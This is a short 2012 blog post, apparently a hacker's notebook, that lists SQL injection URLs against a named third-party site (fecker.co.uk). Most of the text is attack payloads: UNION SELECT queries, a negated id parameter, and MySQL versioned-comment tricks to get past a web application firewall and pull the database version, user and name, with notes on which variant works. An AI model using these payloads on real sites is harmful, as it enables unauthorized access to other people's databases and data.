sql injection

Monday, November 5, 2012


Code:
http://fecker.co.uk/scooby/product.php?id=13+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--

It doesn't accept?

nulled out the id value
make it id=-13



so

http://fecker.co.uk/scooby/product.php?id=-13 /*!Union*/ /*!Select*/ 1,version(),user(),4,5,database(),7,8,9,10--+-



still the same, I guess to bypass the WAF,

~White's~ query woked that is this:

Code:
http://fecker.co.uk/scooby/product.php?id=-13 /*!Union*/ /*!Select*/ 1,version(),user(),4,5,database(),7,8,9,10--+-

but I don't want to be spoon fed, I really want to know, how this happened, the baiscs, I mean only the UNION+SELECT bypass I wanted not the whole database at once so that I get spoon feed'd

I figured out this query should be this

Code:
http://fecker.co.uk/scooby/product.php?id=-13%20/*!Union*/%20/*!Select*/%201,2,3,4,5,6,7,8,9,10--



Code:
http://fecker.co.uk/scooby/product.php?id=-13 /*!union*/ (select 1,2,3,4,5,6,7,8,9,10)--
This works perfectly ^^





0 comments:

Post a Comment